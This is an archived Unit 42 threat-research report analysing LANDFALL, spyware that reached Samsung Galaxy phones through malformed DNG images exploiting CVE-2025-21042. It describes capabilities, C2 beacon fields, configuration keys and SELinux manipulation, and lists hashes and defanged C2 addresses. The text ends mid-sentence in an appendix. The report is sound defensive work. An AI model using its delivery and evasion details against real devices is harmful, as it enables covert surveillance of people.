{ "id": "d509d1bb-45f0-4838-a070-a2a14324c581", "created_at": "2026-04-06T00:18:43.056767Z", "updated_at": "2026-04-10T03:30:46.177612Z", "deleted_at": null, "sha1_hash": "864f9d59af4b4b84b8ed7675fe8dd02a4ddd42a6", "title": "LANDFALL: New Commercial-Grade Android Spyware in Exploit Chain Targeting Samsung Devices", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1628436, "plain_text": "LANDFALL: New Commercial-Grade Android Spyware in Exploit\r\nChain Targeting Samsung Devices\r\nBy Unit 42\r\nPublished: 2025-11-07 · Archived: 2026-04-05 21:24:51 UTC\r\nExecutive Summary\r\nUnit 42 researchers have uncovered a previously unknown Android spyware family, which we have named\r\nLANDFALL. To deliver the spyware, attackers exploited a zero-day vulnerability (CVE-2025-21042) in\r\nSamsung’s Android image processing library. The specific flaw LANDFALL exploited, CVE-2025-21042, is not\r\nan isolated case but rather part of a broader pattern of similar issues found on multiple mobile platforms.\r\nThis vulnerability was actively exploited in the wild before Samsung patched it in April 2025, following reports of\r\nin-the-wild attacks. However, the exploit itself — and the commercial-grade spyware used with it — have not yet\r\nbeen publicly reported and analyzed.\r\nLANDFALL was embedded in malicious image files (DNG file format) that appear to have been sent via\r\nWhatsApp. This method closely resembles an exploit chain involving Apple and WhatsApp that drew attention in\r\nAugust 2025. It also resembles an exploit chain that likely occurred using a similar zero-day vulnerability (CVE-2025-21043) disclosed in September. Our research did not identify any unknown vulnerabilities in WhatsApp.\r\nImportantly, our finding predates these disclosures — the LANDFALL campaign was already operating in mid-2024, using the zero-day Android/Samsung vulnerability (CVE-2025-21042) months before it was fixed.\r\nThe vulnerability has been patched since April 2025, so there is no ongoing risk to current Samsung users. In\r\nSeptember, Samsung also patched another zero-day vulnerability (CVE-2025-21043) in the same image\r\nprocessing library, further protecting against this type of attack.\r\nOur research looks back at historical exploitation that occurred before the patch, providing rare visibility into an\r\nadvanced spyware operation that was publicly unreported.\r\nKey findings:\r\nLANDFALL is Android spyware specifically designed against Samsung Galaxy devices, used in targeted\r\nintrusion activities within the Middle East.\r\nLANDFALL enabled comprehensive surveillance, including microphone recording, location tracking and\r\ncollection of photos, contacts and call logs.\r\nThe spyware is delivered through malformed DNG image files exploiting CVE-2025-21042 — a critical\r\nzero-day vulnerability in Samsung’s image processing library, which was exploited in the wild.\r\nThe exploit chain possibly involved zero-click delivery using maliciously crafted images, similar to recent\r\nexploit chains seen on iOS and Samsung Galaxy.\r\nhttps://unit42.paloaltonetworks.com/landfall-is-new-commercial-grade-android-spyware/\r\nPage 1 of 23\n\nThe campaign shares infrastructure and tradecraft patterns with commercial spyware operations in the\r\nMiddle East, indicating possible links to private-sector offensive actors (PSOAs).\r\nLANDFALL remained active and undetected for months.\r\nPalo Alto Networks customers are better protected through the following products and services:\r\nAdvanced WildFire\r\nAdvanced URL Filtering\r\nAdvanced DNS Security\r\nAdvanced Threat Prevention\r\nIf you think you might have been compromised or have an urgent matter, contact the Unit 42 Incident Response\r\nteam.\r\nRelated Unit 42 Topics Samsung, Vulnerabilities\r\nLANDFALL Spyware Discovery\r\nIn mid-2025, following the public disclosure of an exploit chain targeting iOS devices, we searched for samples of\r\nthe iOS exploit. This led to our discovery of the Android spyware that we called LANDFALL.\r\nSpecifically, Unit 42 discovered several samples of DNG image files containing Android spyware used in an\r\nexploit chain targeting Samsung Galaxy devices. Our analysis confirmed these samples exploit CVE-2025-21042\r\nto deliver LANDFALL, possibly via zero-click exploits on messaging applications.\r\nBeginning the Hunt: The iOS Exploit Chain and How It Made Us Wonder\r\nIn August 2025, Apple issued OS security updates for its various products to address CVE-2025-43300, a zero-day vulnerability affecting DNG image parsing that attackers reportedly exploited in the wild.\r\nThat same month, WhatsApp reported a zero-day vulnerability for CVE-2025-55177 that was chained with the\r\nimage-processing vulnerability for Apple platforms in sophisticated attacks targeting iOS devices. The WhatsApp\r\nvulnerability allowed attackers to force devices to process content from arbitrary URLs.\r\nWhen the two vulnerabilities were combined in an exploit chain, this enabled zero-click remote code execution\r\nthrough maliciously crafted images sent via WhatsApp messages.\r\nGiven the disclosure of this in-the-wild exploit chain and the absence of publicly available exploit samples, we\r\ninitiated a hunt for this activity. Our search led to the discovery of several previously undetected DNG image files\r\ncontaining embedded Android spyware that were uploaded to VirusTotal throughout 2024 and early 2025.\r\nJudging by their filenames (e.g., WhatsApp Image 2025-02-10 at 4.54.17 PM.jpeg and IMG-20240723-\r\nWA0000.jpg), attackers likely delivered these samples via WhatsApp. Our analysis of the embedded spyware\r\nindicates it is designed for Samsung Galaxy devices.\r\nMalformed DNG Image Files: A New Attack Vector Trend\r\nhttps://unit42.paloaltonetworks.com/landfall-is-new-commercial-grade-android-spyware/\r\nPage 2 of 23\n\nOur analysis of LANDFALL spyware began with our discovery of malformed DNG image files. DNG stands for\r\nDigital Negative, and it is a raw image file format based on the TIFF image format. The malformed DNG image\r\nfiles we discovered have an embedded ZIP archive appended to the end of the file. Figure 1 shows one of these\r\nsamples in a hex editor, indicating where the ZIP archive content begins near the end of the file.\r\nFigure 1. Example of a malformed DNG image with an embedded ZIP archive.\r\nOur analysis indicates these DNG files exploit CVE-2025-21042, a vulnerability in Samsung's image-processing\r\nlibrary libimagecodec.quram.so that Samsung patched in April 2025. The exploit extracts shared object library\r\n(.so) files from the embedded ZIP archive to run LANDFALL spyware. Figure 2 below shows a flowchart for this\r\nspyware.\r\nhttps://unit42.paloaltonetworks.com/landfall-is-new-commercial-grade-android-spyware/\r\nPage 3 of 23\n\nFigure 2. Flowchart for LANDFALL spyware.\r\nTable 1 shows the DNG image samples we discovered.\r\nSHA256 Hash Filename\r\nFirst\r\nSeen\r\n9297888746158e38d320b05b27b0032b2cc29231be8990d87bc46f1e06456f93\r\nWhatsApp Image\r\n2025-02-10 at\r\n4.54.17 PM.jpeg\r\nFeb.\r\n10,\r\n2025\r\nb06dec10e8ad0005ebb9da24204c96cb2e297bd8d418bc1c8983d066c0997756\r\nIMG-20250120-\r\nWA0005.jpg\r\nJan.\r\n20,\r\n2025\r\nc0f30c2a2d6f95b57128e78dc0b7180e69315057e62809de1926b75f86516b2e\r\nWhatsApp Image\r\n2024-08-27 at\r\n11.48.40 AM.jpeg\r\nAug.\r\n27,\r\n2024\r\nb975b499baa3119ac5c2b3379306d4e50b9610e9bba3e56de7dfd3927a96032d\r\nPHOTO-2024-08-\r\n27-11-48-41.jpg\r\nAug.\r\n27,\r\n2024\r\n29882a3c426273a7302e852aa77662e168b6d44dcebfca53757e29a9cdf02483\r\nIMG-20240723-\r\nWA0001.jpg\r\nJuly\r\n23,\r\n2024\r\nb45817ffb0355badcc89f2d7d48eecf00ebdf2b966ac986514f9d971f6c57d18 IMG-20240723-\r\nWA0000.jpg\r\nJuly\r\n23,\r\nhttps://unit42.paloaltonetworks.com/landfall-is-new-commercial-grade-android-spyware/\r\nPage 4 of 23\n\n2024\r\nTable 1. DNG files with embedded malware.\r\nFilenames with strings like WhatsApp Image and WA000 imply attackers could have attempted to deliver the\r\nembedded Android spyware via WhatsApp. This matches earlier public reporting of similar DNG image-based\r\nexploitation through WhatsApp targeting Apple devices. Furthermore, WhatsApp researchers identified and\r\nreported a similar DNG vulnerability, CVE-2025-21043, to Samsung.\r\nDelivering LANDFALL Spyware: Mobile Device Malware Exploit Chains\r\nTypically, mobile device malware distributed through exploits requires a chain of exploits across different\r\nvulnerabilities for successful infection. Various studies have documented cases of at least two vulnerabilities when\r\ndistributing spyware, but modern exploit chains for spyware are far more complex [PDF], linking multiple\r\nvulnerabilities to compromise mobile devices and gain privileges.\r\nWe have yet to discover any further exploits associated with this activity.\r\nPlease see the later section, How LANDFALL Fits Into the Larger Picture, for a more complete description of the\r\nknown vulnerabilities involved in this and similar exploit chains.\r\nLANDFALL Spyware Analysis\r\nLANDFALL is Android spyware specifically designed for Samsung Galaxy devices, likely used in targeted\r\nintrusion activities within the Middle East. This modular spyware is engineered for espionage and data\r\nexfiltration.\r\nThe infection chain for LANDFALL involves an exploit for CVE-2025-21042, a vulnerability in Samsung's\r\nimage-processing library tracked by the vendor as Samsung Vulnerabilities and Exposures (SVE) designator SVE-2024-1969. We believe a full attack chain would follow a pattern of potential zero-click remote code execution,\r\nbeginning with the delivery of the malformed DNG images.\r\nTwo components of LANDFALL spyware are embedded within the malformed DNG images and would be\r\nextracted and executed, following a successful exploit:\r\nLoader (b.so): An ARM64 ELF shared object (106 KB, stripped and dynamically linked) that serves as the\r\nmain backdoor.\r\nSELinux Policy Manipulator (l.so): Extracted from an XZ-compressed ELF binary, this component is\r\ndesigned to manipulate the device's SELinux policy to grant LANDFALL elevated permissions and aid\r\npersistence. (See Appendix A - SELinux Policy Manipulation.)\r\nTable 2 shows the LANDFALL component files embedded within the malicious DNG samples.\r\nSHA256 Hash\r\nLANDFALL\r\nComponent\r\nFirst\r\nSeen\r\nhttps://unit42.paloaltonetworks.com/landfall-is-new-commercial-grade-android-spyware/\r\nPage 5 of 23\n\nffeeb0356abb56c5084756a5ab0a39002832403bca5290bb6d794d14b642ffe2 b.so component\r\nJuly\r\n23,\r\n2024\r\nd2fafc7100f33a11089e98b660a85bd479eab761b137cca83b1f6d19629dd3b0 b.so component\r\nAug.\r\n27,\r\n2024\r\na62a2400bf93ed84ebadf22b441924f904d3fcda7d1507ba309a4b1801d44495 b.so component\r\nJan.\r\n23,\r\n2025\r\n384f073d3d51e0f2e1586b6050af62de886ff448735d963dfc026580096d81bd b.so component\r\nFeb.\r\n10,\r\n2025\r\n211311468f3673f005031d5f77d4d716e80cbf3c1f0bb1f148f2200920513261\r\nXZ compressed file\r\n(l) for the SELinux\r\npolicy manipulator\r\nJuly\r\n23,\r\n2024\r\n69cf56ac6f3888efa7a1306977f431fd1edb369a5fd4591ce37b72b7e01955ee\r\nSELinux policy\r\nmanipulator (l.so)\r\nextracted from XZ\r\ncompressed file\r\nJuly\r\n23,\r\n2024\r\nTable 2. LANDFALL components embedded in the DNG image files.\r\nOur analysis indicates LANDFALL is multi-component Android spyware designed for monitoring and data\r\nexfiltration.\r\nOur analysis focuses on the b.so component, which serves as the initial loader for a broader LANDFALL\r\nframework. In its own debug artifacts, the component refers to itself as “Bridge Head.” This will be of interest\r\nlater when we discuss possible relationships between LANDFALL and known spyware groups.\r\nLANDFALL’s Potential Capabilities\r\nThe b.so component of LANDFALL contains numerous debug and status strings, but it does not contain the logic\r\nthat actually references most of these strings. This suggests that b.so would download additional components for\r\nthese capabilities. Our analysis of embedded command strings and execution paths within the b.so file provides\r\ninsight into the broader LANDFALL's potential capabilities.\r\nDevice Fingerprinting\r\nOS version\r\nHardware ID (IMEI)\r\nSIM/Subscriber ID (IMSI)\r\nhttps://unit42.paloaltonetworks.com/landfall-is-new-commercial-grade-android-spyware/\r\nPage 6 of 23\n\nSIM card serial\r\nUser account\r\nVoicemail number\r\nNetwork configuration\r\nTaking inventory of installed applications\r\nAccessing location services\r\nVPN status\r\nUSB debugging status\r\nBluetooth\r\nData Exfiltration\r\nRecording microphone\r\nRecording calls\r\nCall history\r\nContacts database\r\nSMS/messaging data\r\nCamera photos\r\nArbitrary files\r\nDatabases on the device (browsing history, etc.)\r\nExecution, Loading and Persistence\r\nLoading native shared object (.so) modules\r\nLoading and executing DEX files from memory and disk\r\nInjecting processes\r\nExecuting via LD_PRELOAD\r\nExecuting arbitrary commands\r\nManipulating SELinux\r\nPersistency\r\nModifying SELinux policy via compressed binary\r\nMonitoring WhatsApp Media directory for additional payloads\r\nRegistering WhatsApp web client\r\nManipulating the file system in Android app directories\r\nManipulating the file system\r\nEvasion and Defense Avoidance\r\nDetecting TracerPid debugger\r\nDetecting Frida instrumentation framework\r\nDetecting Xposed framework\r\nDynamic library loading with namespace manipulation\r\nCertificate pinning for C2 communications\r\nhttps://unit42.paloaltonetworks.com/landfall-is-new-commercial-grade-android-spyware/\r\nPage 7 of 23\n\nCleaning up WhatsApp images payload\r\nTargeted Device Models\r\nGalaxy S23 Series (S91[168]BXX.*)\r\nGalaxy S24 Series (S921BXXU1AWM9, S92[168]BXX.*)\r\nGalaxy Z Fold4 (F936BXXS4DWJ1)\r\nGalaxy S22 (S901EXXS4CWD1)\r\nGalaxy Z Flip4 (F721BXXU1CWAC)\r\nFigure 3 shows an example of the targeted device model strings in a b.so sample of LANDFALL.\r\nFigure 3. LANDFALL b.so sample in a hexadecimal editor showing targeted device model\r\nnumbers.\r\nC2 Communication\r\nThe b.so component of LANDFALL communicates with its C2 server over HTTPS using a non-standard,\r\nephemeral TCP port. Before the HTTPS traffic, it can initiate ping traffic as detailed in the Communication With\r\nthe C2 Server section of Appendix B. For HTTPS traffic, b.so initiates contact with a POST request containing\r\ndetailed device and spyware information, such as:\r\nAgent ID\r\nDevice path\r\nUser ID\r\nFigure 4 shows an interpretation of this initial POST request, where we use curl to show how this request would\r\nbe structured. Of note, LANDFALL does not use curl to generate this traffic.\r\nhttps://unit42.paloaltonetworks.com/landfall-is-new-commercial-grade-android-spyware/\r\nPage 8 of 23\n\nFigure 4. HTTP POST request structure when b.so initially contacts the C2 server.\r\nThe initial beacon traffic is an HTTP POST request to the C2 server with the following parameters:\r\nprotocol: The protocol version (e.g., A1.5.0)\r\nprotocol_ver: The protocol version (e.g., \"\")\r\ntype: The message type (e.g., MSG_TYPE_GET_AGENT)\r\nagent_id: The agent's unique identifier\r\nupload_id: An upload identifier\r\ncommand_id: A command identifier\r\nsource: The source of the request (e.g., bridge_head)\r\nincremental_build: The incremental build version (e.g., v1.5.0)\r\neuid: The effective user ID of the process\r\nbh_path: The path to the b.so binary on the device\r\nrunner: The runner mode (e.g., I)\r\nConfiguration of b.so File\r\nThe b.so file's configuration is managed through a combination of hard-coded default values and an encrypted\r\nJSON object embedded within itself. This configuration includes C2 details, cryptographic keys and unique\r\nidentifiers for the agent and commands.\r\nFigure 5 shows an example of this configuration.\r\nFigure 5. Example of LANDFALL’s configuration.\r\nhttps://unit42.paloaltonetworks.com/landfall-is-new-commercial-grade-android-spyware/\r\nPage 9 of 23\n\nThis b.so component of LANDFALL also contains a number of hard-coded configuration values. These are used\r\nas default values if they are not provided in the encrypted JSON object. We do not yet fully understand the\r\npurpose of some of these values. Table 3 shows these hard-coded default configuration values.\r\nField Name Default Value\r\nallow_wifi true\r\nallow_mobile true\r\nallow_roaming false\r\nsocket_timeout 5\r\nsleep_time 60 (0x3c)\r\nsleep_time_between_retries 35 (0x23)\r\nsuicide_time 7200 (0x1c20)\r\nlive_mode_expiration 0\r\nallow_min_battery 0\r\nis_persistent false\r\nTable 3. Hard-coded default configuration values for LANDFALL malware.\r\nC2 Infrastructure for LANDFALL Spyware\r\nBased on our analysis of these samples, we identified six C2 servers for LANDFALL, shown below in Table 4.\r\nIP Address Domain First Seen Last Seen\r\n194.76.224[.]127 brightvideodesigns[.]com Feb. 7, 2025 Sept. 19, 2025\r\n91.132.92[.]35 hotelsitereview[.]com Feb. 3, 2025 Sept. 16, 2025\r\n92.243.65[.]240 healthyeatingontherun[.]com Oct. 11, 2024 Sept. 2, 2025\r\n192.36.57[.]56 projectmanagerskills[.]com Feb. 3, 2025 Aug. 26, 2025\r\n46.246.28[.]75 Unknown Unknown Unknown\r\n45.155.250[.]158 Unknown Unknown Unknown\r\nTable 4. LANDFALL C2 servers.\r\nHow LANDFALL Fits Into the Larger Picture\r\nhttps://unit42.paloaltonetworks.com/landfall-is-new-commercial-grade-android-spyware/\r\nPage 10 of 23\n\nLANDFALL is one example of a larger pattern of exploit chains affecting mobile devices, related to DNG image\r\nprocessing vulnerabilities.\r\nThe LANDFALL campaign's use of a malformed DNG file highlights a significant, recurring attack vector: the\r\ntargeting of vulnerabilities within DNG image processing libraries. The specific flaw LANDFALL exploited,\r\nCVE-2025-21042, is not an isolated case but rather part of a broader pattern of similar issues found on multiple\r\nmobile platforms. In fact, earlier in 2025, Samsung identified another DNG flaw in the same Samsung library,\r\nCVE-2025-21043, and the parallel exploit chain on iOS was identified that leveraged CVE-2025-43300 in Apple\r\niOS and CVE-2025-55177 in WhatsApp.\r\nRelationship to CVE-2025-21043 (SVE-2025-1702)\r\nOur analysis revealed a possible connection to a separate vulnerability in the same library, CVE-2025-21043\r\n(SVE-2025-1702), which Samsung patched in its September 2025 security update. While it was not exploited in\r\nthe LANDFALL samples we discovered, the similarities between the exploit for LANDFALL (CVE-2025-21042)\r\nand this vulnerability (CVE-2025-21043) are striking. Both vulnerabilities were publicly disclosed around the\r\nsame time and both are connected to DNG image file processing delivered through mobile communication\r\napplications.\r\nApple's CVE-2025-43300\r\nIn August 2025, Apple addressed CVE-2025-43300, a zero-day vulnerability impacting DNG image parsing,\r\nwhich was actively exploited in the wild, to enable zero-click remote code execution through malicious images\r\nsent via mobile communication applications.\r\nWe cannot confirm whether this chain was used to deliver an equivalent of LANDFALL to iOS, or whether it is\r\nthe same threat actor behind the two. However, this parallel development in the iOS ecosystem, combined with the\r\ndisclosure of the Samsung and Apple vulnerabilities just a few weeks apart, highlights a broader pattern of DNG\r\nimage processing vulnerabilities being leveraged in sophisticated mobile spyware attacks.\r\nhttps://unit42.paloaltonetworks.com/landfall-is-new-commercial-grade-android-spyware/\r\nPage 11 of 23\n\nFigure 6. Timeline for recent malicious DNG image files and associated exploit activity.\r\nJuly 2024 – February 2025: Initial samples of malicious DNG image files carrying LANDFALL are first\r\nsubmitted on VirusTotal in July 2024, with additional samples appearing periodically over the next several\r\nmonths.\r\nThe DNG files exploit a vulnerability in Samsung’s Android image processing library (SVE-2024-\r\n1969, CVE-2025-21042)\r\nSept. 25, 2024: The vulnerability is privately reported to Samsung.\r\nApril 2025: Samsung issues a firmware update to address the vulnerability, SVE-2024-1969, later known\r\nas CVE-2025-21042 when publicly disclosed.\r\nAugust 2025: Parallel developments occur.\r\nApple patches a zero-day vulnerability impacting DNG image parsing, which was actively exploited\r\nin the wild (CVE-2025-43300)\r\nWhatsApp discloses a vulnerability (CVE-2025-55177) that was chained with Apple’s DNG image\r\nparsing zero-day vulnerability (CVE-2025-43300)\r\nWe discovered DNG image files exploiting CVE-2025-21042 to deliver Android spyware that we\r\nidentified as LANDFALL.\r\nWhatsApp disclosed to Samsung CVE-2025-21043 — another DNG-related zero-day vulnerability\r\nin Samsung Galaxy devices.\r\nSeptember 2025: Samsung issues mobile device firmware updates for CVE-2025-21043 (SVE-2025-\r\n1702). Concurrently, it assigns CVE-2025-21042 (SVE-20254-1969) to the earlier vulnerability that\r\npreviously had no CVE designator.\r\nhttps://unit42.paloaltonetworks.com/landfall-is-new-commercial-grade-android-spyware/\r\nPage 12 of 23\n\nPotential Victims\r\nAnalysis of VirusTotal submission data for the malicious DNG files indicates potential targets in Iraq, Iran, Turkey\r\nand Morocco.\r\nTurkey's national CERT (in Turkish, USOM) reported IP addresses used by LANDFALL's C2 servers as\r\nmalicious, mobile- and APT-related, which also supports the possible targeting of victims in Turkey.\r\nRelationship to Known Spyware Groups\r\nWhile we were unable to recover every component of the LANDFALL framework, it is clear that the tool is\r\ncommercial grade. It may have utilized several zero-day exploits in its infection chain.\r\nSuch tools are often developed and sold as commercial spyware and attributed to groups known as private sector\r\noffensive actors (PSOAs), who are often legitimate legal entities. Reportedly, these groups provide services to\r\ngovernment entities.\r\nWe were not able at this time to officially attribute LANDFALL activity to a known PSOA or threat actor. Unit 42\r\ntracks the activity related to CVE-2025-21042 and LANDFALL as CL-UNK-1054.\r\nTwo aspects are notable and worth highlighting.\r\nFirst, LANDFALL's C2 infrastructure and domain registration patterns share similarities to infrastructure\r\nassociated with Stealth Falcon as observed by Unit 42. These similarities are based on various public reports, as\r\nwell as Stealth Falcon activity we have analyzed for targets in the Middle East.\r\nSecond, in its own debug artifacts, the spyware component we analyzed refers to itself as “Bridge Head.” Of note,\r\nthe term Bridge Head is a common nickname used by some private-sector offensive cyber companies (including\r\nNSO, Variston [PDF], Cytrox and Quadream) for first-stage loaders. However, this naming convention alone does\r\nnot constitute a direct attribution link.\r\nWhile this is a common name used in commercial mobile spyware to describe loaders, it draws similarities to the\r\nHeliconica framework. This framework also contains references to “BridgeHead,” as Google TAG reported about\r\nspyware vendor Variston. Google identified Variston as a Barcelona-based PSOA (provider of exploits). Further\r\nanalysis from Google and other reports indicated Variston's tooling was supplied to clients in the UAE through a\r\nreseller named Protect Electronic Systems (or Protected AE).\r\nThis potential provider-client link to the UAE is noteworthy, as Microsoft and others reported that Stealth Falcon\r\nalso operates heavily out of that country. Variston reportedly ceased operations in early 2025 following its public\r\nexposure.\r\nAs of October 2025, except in infrastructure, we have not observed direct overlaps between the mobile campaigns\r\nof LANDFALL and the endpoint-based activity from Stealth Falcon, nor direct strong links with Stealth Falcon.\r\nHowever, the similarities are worth discussion.\r\nConclusion\r\nhttps://unit42.paloaltonetworks.com/landfall-is-new-commercial-grade-android-spyware/\r\nPage 13 of 23\n\nThe discovery of LANDFALL spyware reveals a campaign targeting Samsung Android devices. The exploit chain\r\ninvolves CVE-2025-21042, a vulnerability that was patched by Samsung in April 2025. The presence of this\r\nspyware within DNG image files with WhatsApp-related naming conventions likely indicates attackers attempted\r\nto deliver the exploit through a messaging application.\r\nFrom the initial appearance of samples in July 2024, this activity highlights how sophisticated exploits can remain\r\nin public repositories for an extended period before being fully understood.\r\nThe analysis of the loader reveals evidence of commercial-grade activity. The LANDFALL spyware components\r\nsuggest advanced capabilities for stealth, persistence and comprehensive data collection from modern Samsung\r\ndevices.\r\nHowever, we have not directly analyzed the next-stage components of the spyware. Additional details on this or\r\non the exact delivery method would provide even more insight into the malicious activity.\r\nPalo Alto Networks customers are better protected from LANDFALL Android spyware through the following\r\nproducts:\r\nThe Advanced WildFire machine-learning models and analysis techniques have been reviewed and updated\r\nin light of the indicators shared in this research.\r\nAdvanced URL Filtering and Advanced DNS Security identify known domains and URLs associated with\r\nthis activity as malicious.\r\nAdvanced Threat Prevention has an inbuilt machine learning-based detection that can detect exploits in real\r\ntime.\r\nIf you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident\r\nResponse team or call:\r\nNorth America: Toll Free: +1 (866) 486-4842 (866.4.UNIT42)\r\nUK: +44.20.3743.3660\r\nEurope and Middle East: +31.20.299.3130\r\nAsia: +65.6983.8730\r\nJapan: +81.50.1790.0200\r\nAustralia: +61.2.4062.7950\r\nIndia: 000 800 050 45107\r\nPalo Alto Networks has shared these findings with our fellow Cyber Threat Alliance (CTA) members. CTA\r\nmembers use this intelligence to rapidly deploy protections to their customers and to systematically disrupt\r\nmalicious cyber actors. Learn more about the Cyber Threat Alliance.\r\nIndicators of Compromise\r\nMalware Samples\r\nA list of malware samples for LANDFALL activity is listed below in Table 7.\r\nhttps://unit42.paloaltonetworks.com/landfall-is-new-commercial-grade-android-spyware/\r\nPage 14 of 23\n\nSHA256 Hash Filename Size\r\nb06dec10e8ad0005ebb9da24204c96cb2e297bd8d418bc1c8983d066c0997756\r\nimg-20250120-\r\nwa0005.jpg\r\n6.66\r\nMB\r\nc0f30c2a2d6f95b57128e78dc0b7180e69315057e62809de1926b75f86516b2e 2.tiff\r\n6.58\r\nMB\r\n9297888746158e38d320b05b27b0032b2cc29231be8990d87bc46f1e06456f93\r\nwhatsapp image\r\n2025-02-10 at\r\n4.54.17 pm.jpeg\r\n6.66\r\nMB\r\nd2fafc7100f33a11089e98b660a85bd479eab761b137cca83b1f6d19629dd3b0 b.so\r\n103.31\r\nKB\r\n384f073d3d51e0f2e1586b6050af62de886ff448735d963dfc026580096d81bd\r\n103.31\r\nKB\r\nb975b499baa3119ac5c2b3379306d4e50b9610e9bba3e56de7dfd3927a96032d 1.jpeg\r\n5.66\r\nMB\r\na62a2400bf93ed84ebadf22b441924f904d3fcda7d1507ba309a4b1801d44495\r\n103.31\r\nKB\r\n29882a3c426273a7302e852aa77662e168b6d44dcebfca53757e29a9cdf02483\r\nimg-20240723-\r\nwa0001.jpg\r\n6.58\r\nMB\r\n2425f15eb542fca82892fd107ac19d63d4d112ddbfe698650f0c25acf6f8d78a 6357fc.zip\r\n380.71\r\nKB\r\nb45817ffb0355badcc89f2d7d48eecf00ebdf2b966ac986514f9d971f6c57d18\r\nimg-20240723-\r\nwa0000.jpg\r\n5.65\r\nMB\r\n69cf56ac6f3888efa7a1306977f431fd1edb369a5fd4591ce37b72b7e01955ee localfile~\r\n1.42\r\nMB\r\n211311468f3673f005031d5f77d4d716e80cbf3c1f0bb1f148f2200920513261 l\r\n332.88\r\nKB\r\nffeeb0356abb56c5084756a5ab0a39002832403bca5290bb6d794d14b642ffe2\r\n103.31\r\nKB\r\nTable 7. Malware samples for LANDFALL activity.\r\nIP Addresses\r\n45.155.250[.]158\r\n46.246.28[.]75\r\nhttps://unit42.paloaltonetworks.com/landfall-is-new-commercial-grade-android-spyware/\r\nPage 15 of 23\n\n91.132.92[.]35\r\n92.243.65[.]240\r\n192.36.57[.]56\r\n194.76.224[.]127\r\nDomain Names\r\nbrightvideodesigns[.]com\r\nhealthyeatingontherun[.]com\r\nhotelsitereview[.]com\r\nprojectmanagerskills[.]com\r\nAdditional Resources\r\nCISA Adds One Known Exploited Vulnerability to Catalog – Alert, CISA\r\nNVD - CVE-2025-21042 – NIST\r\nNVD - CVE-2025-43300 – NIST\r\nNVD - CVE-2025-55177 – NIST\r\nSamsung Mobile Security Updates – Samsung\r\nWhatsApp Security Advisories 2025 – WhatsApp\r\nStealth Falcon's Exploit of Microsoft Zero Day Vulnerability – Check Point Research\r\nStealth Falcon preying over Middle Eastern skies with Deadglyph – ESET\r\nBuying Spying [PDF] – Google TAG\r\nNew details on commercial spyware vendor Variston – Google TAG\r\nIP address entry for 91.132.92[.]35 – Turkish National CERT (USOM)\r\nCVE-2025-21043 Analysis: When DNG Opcodes Become Attack Vectors – Blog, Matt Suiche\r\nELEGANT BOUNCER Detection Framework – Matt Suiche, GitHub\r\nAppendices\r\nAppendix A: SELinux Policy Manipulation\r\nLANDFALL's component for SELinux policy manipulation is l.so. This file provides a capability to bypass\r\nsystem security controls. It is decompressed from /data/data/com.samsung.ipservice/files/l to\r\n/data/data/com.samsung.ipservice/files/l.so and executed.\r\nRather than containing hard-coded rules, l.so implements a generic engine that can dynamically parse and load\r\nnew SELinux policy statements from an external source, modifying the running policy in memory.\r\nRelevant and unique exported functions:\r\nsepolicy_from_data: Load policy from binary data\r\nsepolicy_add_statement: Add individual policy statements\r\nsepolicy_to_buffer: Serialize modified policy\r\nsepolicy_delete: Clean up policy objects\r\nhttps://unit42.paloaltonetworks.com/landfall-is-new-commercial-grade-android-spyware/\r\nPage 16 of 23\n\nAppendix B: Additional Details on LANDFALL Spyware Analysis\r\nThis appendix details the observed capabilities of the loader component of LANDFALL, as well as those we infer\r\nexist in other modules of the complete LANDFALL framework that we have not yet accessed.\r\nLANDFALL’s Bridge Head, named on the disk as b.so, is loaded by an exploit on the device. Immediately after\r\nbeing loaded post‑exploit, LANDFALL parses LD_PRELOAD from the environment to avoid inheriting upstream\r\npreloads. It reads the effective user ID via geteuid() and stores it globally so later branches can adjust behavior for\r\nroot versus non‑root. Then it calls into the main routine.\r\nIt gathers process basics (parent pid, euid, Android build string), reads a runner flag from the environment variable\r\nR and takes a copy of it for later actions. This value (typically I for interactive or P for passive) will be reported to\r\nthe command and control and determine how it launches a later staged payload. It resolves its own mapped path,\r\nselects the app-private base at /data/data/com.samsung.ipservice/files/ as its working directory and then constructs\r\ntwo child paths there. One path is for the staged download and one is for the final l.so used for execution.\r\nConfiguration\r\nLANDFALL reads and XOR-decrypts a JSON configuration directly from its own file. The spyware normalizes\r\nconfiguration by writing internal defaults back into the parsed object: numeric fields default when missing or zero,\r\nand certain booleans are coerced to fixed values regardless of the supplied configuration. Finally, it checks that a\r\npublic key (X.509 DER) is present in the configuration and exits otherwise.\r\nTable 8 summarizes the configuration normalization performed at this stage.\r\nKey Name Value Type Default Required\r\nallow_wifi boolean\r\nEnforced true (overrides false/missing to\r\ntrue)\r\nNo\r\nallow_mobile boolean\r\nEnforced true (overrides false/missing to\r\ntrue)\r\nNo\r\nallow_roaming boolean\r\nDefault false if missing/false; true\r\nremains true\r\nNo\r\nallow_min_battery integer 0 if value is 0 or missing No\r\nsleep_time\r\ninteger\r\n(seconds)\r\n60 if value is 0 or missing No\r\nsleep_time_between_retries\r\ninteger\r\n(seconds)\r\n35 if value is 0 or missing No\r\nsuicide_time\r\ninteger\r\n(seconds)\r\n7200 if value is 0 or missing No\r\nhttps://unit42.paloaltonetworks.com/landfall-is-new-commercial-grade-android-spyware/\r\nPage 17 of 23\n\nlive_mode_expiration\r\ninteger\r\n(seconds)\r\n0 if value is 0 or missing No\r\nsocket_timeout\r\ninteger\r\n(seconds)\r\n5 if value is 0 or missing No\r\nis_persistent boolean\r\nDefault false if missing/false; true remains\r\ntrue\r\nNo\r\nbridge_head_version_major integer Hard-set to 2 (always) No\r\nbridge_head_version_minor integer Hard-set to 1 (always) No\r\ncnc_hostname string None; must be present Yes\r\ncnc_port integer None; must be non-zero Yes\r\ncnc_base_url string None; must be present Yes\r\nagent_id string (UUID) None; must be present Yes\r\ncommand_id string (UUID) None; must be present Yes\r\ncommands array\r\nMust exist; read and freed (structure not\r\nretained here)\r\nYes\r\npublic_key\r\nX.509 DER\r\n(bytes)\r\nNone; must be present and valid Yes\r\nTable 8. Keys and values for LANDFALL malware.\r\nCommunication With the C2 Server\r\nOnce configuration is complete, b.so loads the necessary network and encryption functions, sets up its SSL\r\nenvironment, and prepares a secure client context for future HTTPS communication. If any part of this setup fails,\r\nit exits cleanly rather than risk a partial setup.\r\nBefore entering the C2 beaconing loop, it optionally emits telemetry. If it is running as root, it formats a concise\r\n\"started\" line that includes:\r\nA fixed version marker 